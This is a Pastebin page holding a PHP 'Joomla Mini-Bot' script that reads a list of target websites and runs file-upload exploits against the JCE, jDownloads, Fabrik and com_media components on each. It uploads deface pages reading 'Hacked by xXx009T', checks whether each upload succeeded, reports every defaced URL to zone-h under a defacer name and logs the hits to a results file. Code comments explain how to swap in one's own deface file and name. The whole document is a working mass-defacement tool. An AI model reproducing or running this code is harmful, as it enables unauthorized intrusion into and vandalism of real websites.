API tools faq
paste
Advertisement
Kyfx

Mini joomla Bot

Kyfx
Mar 28th, 2015
445
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 10.64 KB | None | 0 0
raw download clone embed print report
  1. <?php
  2.  
  3. /*
  4. Joomla Mini-Bot coded by Mr.MaGnoM
  5.  
  6. GreeTz : CrashBandicot -- Yunus Incredibl and All my friends -- CodersLeet members
  7.  
  8. for more tools : http://magsec.blogspot.com/ -- http://pastebin.com/u/magnom
  9.  
  10. Dont change the right of code ;)
  11.  
  12. http://magsec.blogspot.com/2014/10/joomla-mini-bot.html
  13.  
  14. */
  15.  
  16. set_time_limit(0);
  17. error_reporting(0);
  18.  
  19. print("
  20.  
  21. __ __ __ __ _____ __ __
  22. | \/ | | \/ | / ____| | \/ |
  23. | \ / |_ __| \ / | __ _| | __ _ __ ___ | \ / |
  24. | |\/| | '__| |\/| |/ _` | | |_ | '_ \ / _ \| |\/| |
  25. | | | | |_ | | | | |_| | |__| | | | | (_) | | | |
  26. |_| |_|_(_)|_| |_|\__,_|\_____|_| |_|\___/|_| |_|
  27. Joomla Mini_Bot Greets to all my friends
  28.  
  29.  
  30. ");
  31.  
  32. if(!$argv[1]){
  33. die("usage $argv[0] list.txt ");
  34. }
  35.  
  36. $getlist=@file_get_contents($argv[1]);
  37. $ex=explode("\r\n",$getlist);
  38. echo "\n\t Total sites : ".count($ex)."\n";
  39. /* $aar=array(
  40. "/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form",
  41. "/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1",
  42. "/index.php?option=com_jdownloads&Itemid=0&view=upload",
  43. "/index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder=",
  44. );*/
  45.  
  46.  
  47. //foreach($aar as $com){
  48. foreach($ex as $maw){
  49. $open=fopen("result.html","a");
  50. global $open;
  51. echo "\n[+]Scanning : $maw";
  52. jce($maw);
  53. jd($maw);
  54. fabrik($maw);
  55. media($maw);
  56. /*
  57. $urlxx=($maw).($com);
  58. $geat=@file_get_contents($urlxx);
  59. if(eregi('{"result":null,"error":"No function call specified!"}',$geat)){
  60. echo "\n[-]Found : com_jce";
  61. jce($maw);
  62. }else{echo "\n[-]com_jce not found";}
  63. if(eregi("com_jdownloads",$geat)){
  64. echo "\n[-]Found : com_jdowloads";
  65. jd($maw);
  66. }else{echo "\n[-]com_jdowloads not found";}
  67. if(eregi("com_fabrik",$geat)){
  68. echo "\n[-]Found : com_fabrik";
  69. fabrik($maw);
  70. }else{echo "\n[-]com_fabrik not found";}
  71. if(eregi("return-url",$geat)){
  72. echo "\n[-]Found : com_media";
  73. media($maw);
  74. }{echo "\n[-]com_media not found\n";}
  75. }*/
  76. }
  77.  
  78. function jd($url){ // for jdownloads exploit
  79. global $open;
  80. $file1='h.zip';
  81. $file2='h.gif';
  82.  
  83. $bbb='/index.php?option=com_jdownloads&Itemid=0&view=upload';
  84. $sco=($url).($bbb);
  85.  
  86. $post=array(
  87. 'name'=>'ur name','mail'=>'hackedby@gmail.com','catlist'=>'1','file_upload'=>"@$file1",'filetitle' =>"lolz",
  88. 'description'=>"<p>zot</p>" ,'2d1a8f3bd0b5cf542e9312d74fc9766f'=>1,
  89. 'send'=>1,'senden'=>"Send file", 'description'=>"<p>qsdqsdqsdqsdqsdqsdqsd</p>",
  90. 'option'=>"com_jdownloads",'view'=>"upload",'pic_upload'=>"@$file2"
  91. );
  92. $ch = curl_init ($sco);
  93. curl_setopt ($ch, CURLOPT_RETURNTRANSFER, TRUE);
  94. curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, TRUE);
  95. curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT,3 );
  96. curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.94 Safari/537.36");
  97. curl_setopt ($ch, CURLOPT_POST, TRUE);
  98. curl_setopt ($ch, CURLOPT_POSTFIELDS, $post);
  99. $data = curl_exec ($ch);
  100.  
  101. curl_close ($ch);
  102. $path='/images/jdownloads/screenshots/';
  103. $final=($url).($path).($file2);
  104. if(eregi('The file was successfully transferred to the server!',$data)or preg_match("/color=\"green\">/",$data)){
  105. echo "\n[-]Defaced $final";
  106.  
  107.  
  108. $ch = curl_init ("http://www.zone-h.com/notify/single");
  109. curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
  110. curl_setopt ($ch, CURLOPT_POST, 1);
  111. curl_setopt ($ch, CURLOPT_POSTFIELDS, "defacer=xXx009T&domain1=$final&hackmode=1&reason=1");
  112. if (preg_match ("/color=\"red\">OK<\/font><\/li>/i", curl_exec ($ch))){
  113. echo "\n[-]Zone-h --> Ok ";
  114. fwrite($open,"$final <br>[-]exploit : jdowloads<br>[-]zone-h : ok<br><br>");
  115. }else{
  116. echo "\n[-]Zone-h --> No";
  117. fwrite($open,"$final <br>[-]exploit : jdowloads<br>[-]zone-h : no<br><br>"); }
  118. curl_close ($ch);
  119.  
  120.  
  121. }else{
  122. echo "\n[-]Com_jdowloads : not infected ";
  123.  
  124.  
  125. }
  126. }
  127. function fabrik($url2){ // com_fabrik exploit
  128. global $open;
  129. $post = array(
  130. "userfile" => "@h.txt", // this file is ur index .html or .txt
  131. "name" => "me.php",
  132. "drop_data" => "1",
  133. "overwrite" => "1",
  134. "field_delimiter" => ",",
  135. "text_delimiter" => "&quot;",
  136. "option" => "com_fabrik",
  137. "controller" => "import",
  138. "view" => "import",
  139. "task" => "doimport",
  140. "Itemid" => "0",
  141. "tableid" => "0",
  142. );
  143. $ch = curl_init ("$url2/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1");
  144. curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
  145. curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
  146. curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  147. curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, 5);
  148. curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
  149. curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
  150. curl_setopt ($ch, CURLOPT_POST, 1);
  151. @curl_setopt ($ch, CURLOPT_POSTFIELDS, $post);
  152. $data = curl_exec ($ch);
  153. curl_close ($ch);
  154.  
  155. $ud=($url2).("/media/h.txt"); // d.txt : rename it to name of ur index example if ur index named lol.html write it like that : /media/lol.html :D
  156. $get22=@file_get_contents($ud);
  157. if(eregi("Hacked by xXx009T",$get22)){ // Hacked by Mr.MaGnoM : here put some words exist on ur index for cheek file was uploaded or no just 2 words or 3 or 1 example if u put ur name on index put it here
  158. echo "\n[-]Defaced : $ud\n";
  159.  
  160. $ch3 = curl_init ("http://www.zone-h.com/notify/single");
  161. curl_setopt ($ch3, CURLOPT_RETURNTRANSFER, 1);
  162. curl_setopt ($ch3, CURLOPT_POST, 1);
  163. curl_setopt ($ch3, CURLOPT_POSTFIELDS, "defacer=xXx009T&domain1=$ud&hackmode=1&reason=1"); // here put ur name on zone-h
  164. if (preg_match ("/color=\"red\">OK<\/font><\/li>/i", curl_exec ($ch3))){
  165. echo "[-]Zone-h : Ok ";
  166. fwrite($open,"$ud <br>[-]exploit : fabrik<br>[-]zone-h : ok<br><br>");
  167. }else{
  168. echo "[-]Zone-h : No";
  169. fwrite($open,"$ud <br>[-]exploit : fabrik<br>[-]zone-h : no<br><br>");
  170. }
  171. curl_close ($ch3);
  172. }else{
  173. echo "\n[-]Com_fabrik : not infected ";
  174. }
  175. }
  176.  
  177. function jce($site){ //jce exploit
  178. global $open;
  179. $filejce = "h.gif"; // here ur image ;)
  180.  
  181. $post = array
  182. (
  183. "upload-dir" => "./../../",
  184. "Filedata" => "@$filejce",
  185. "upload-overwrite" => "0",
  186. "action" => "upload"
  187. );
  188.  
  189. $ch = curl_init ("$site/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form");
  190. curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
  191. curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
  192. curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  193. curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, 5);
  194. curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
  195. curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
  196. curl_setopt ($ch, CURLOPT_POST, 1);
  197. curl_setopt ($ch, CURLOPT_POSTFIELDS, $post);
  198. curl_setopt($ch, CURLOPT_HTTPHEADER, array(
  199. 'Content-Type: multipart/form-data',
  200. 'Accept-Language: en-US,en;q=0.5',
  201. 'Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7',
  202. 'Connection: Close',
  203. 'Proxy-Connection: close',
  204. 'Cookie: 6bc427c8a7981f4fe1f5ac65c1246b5f=9d09f693c63c1988a9f8a564e0da7743; jce_imgmanager_dir=%2F; __utma=216871948.2116932307.1317632284.1317632284.1317632284.1; __utmb=216871948.1.10.1317632284; __utmc=216871948; __utmz=216871948.1317632284.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(non\u200be)'
  205. ));
  206. $data = curl_exec ($ch);
  207. curl_close ($ch);
  208.  
  209. if(eregi('{"result":{"error":false,"result":"","text":"h.gif"},"error":null}',$data)){ // name of ur image gif this for cheek file uploaded or no
  210. //$jce1="/images/stories/$filejce";
  211. $aa=($site).($filejce);
  212. echo "\n[-]Defaced : $aa";
  213.  
  214. $ch3 = curl_init ("http://www.zone-h.com/notify/single");
  215. curl_setopt ($ch3, CURLOPT_RETURNTRANSFER, 1);
  216. curl_setopt ($ch3, CURLOPT_POST, 1);
  217. curl_setopt ($ch3, CURLOPT_POSTFIELDS, "defacer=xXx009T&domain1=$aa&hackmode=1&reason=1");
  218. if (preg_match ("/color=\"red\">OK<\/font><\/li>/i", curl_exec ($ch3))){
  219. echo "\n[-]Zone-h --> Ok ";
  220. fwrite($open,"$aa <br>[-]exploit : jce<br>[-]zone-h : ok<br><br>");
  221. }else{
  222. echo "\n[-]Zone-h --> No";
  223. fwrite($open,"$aa <br>[-]exploit : jce<br>[-]zone-h : no<br><br>"); }
  224. curl_close ($ch3);
  225.  
  226. }else{
  227. echo "\n[-]Com_jce : not infected";
  228. }
  229.  
  230. }
  231.  
  232. function media($url3){ // com_media exploiter
  233. global $open;
  234. $index="h.txt"; // ur file txt
  235. $value = "aW5kZXgucGhwP29wdGlvbj1jb21fbWVkaWEmdmlldz1pbWFnZXMmdG1wbD1jb21wb25lbnQmZmllbGRpZD0mZV9uYW1lPWpmb3JtX2FydGljbGV0ZXh0JmFzc2V0PWNvbV9jb250ZW50JmF1dGhvcj0=";
  236.  
  237. $post = array ("Filedata" => "@".$index, "return-url" => $value);
  238.  
  239. $ch = curl_init ("$url3/index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder=");
  240. curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
  241. curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
  242. curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  243. curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, 5);
  244. curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
  245. curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
  246. curl_setopt ($ch, CURLOPT_POST, 1);
  247. @curl_setopt ($ch, CURLOPT_POSTFIELDS, $post);
  248. $data = curl_exec ($ch);
  249. curl_close ($ch);
  250. $fix="/images/$index";
  251. $urls=($url3).($fix);
  252. if (eregi("Hacked by xXx009T",$urls)){ // here put 2 words for cheek file uploaded like com_fabrik
  253. echo "\n[-]Defaced : $urls";
  254.  
  255. $ch3 = curl_init ("http://www.zone-h.com/notify/single");
  256. curl_setopt ($ch3, CURLOPT_RETURNTRANSFER, 1);
  257. curl_setopt ($ch3, CURLOPT_POST, 1);
  258. curl_setopt ($ch3, CURLOPT_POSTFIELDS, "defacer=xXx009T&domain1=$urls&hackmode=1&reason=1");
  259. if (preg_match ("/color=\"red\">OK<\/font><\/li>/i", curl_exec ($ch3))){
  260. echo "\n[-]Zone-h --> Ok ";
  261. fwrite($open,"$urls <br>[-]exploit : com_media<br>[-]zone-h : ok<br><br>");
  262. }else{
  263. echo "\n[-]Zone-h --> No";
  264. fwrite($open,"$urls <br>[-]exploit : com_media<br>[-]zone-h : no<br><br>"); }
  265. curl_close ($ch3);
  266. }else{
  267. echo "\n[-]Com_media : not infected \n";
  268. }
  269. }
  270.  
  271. fclose($open);
  272.  
  273. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!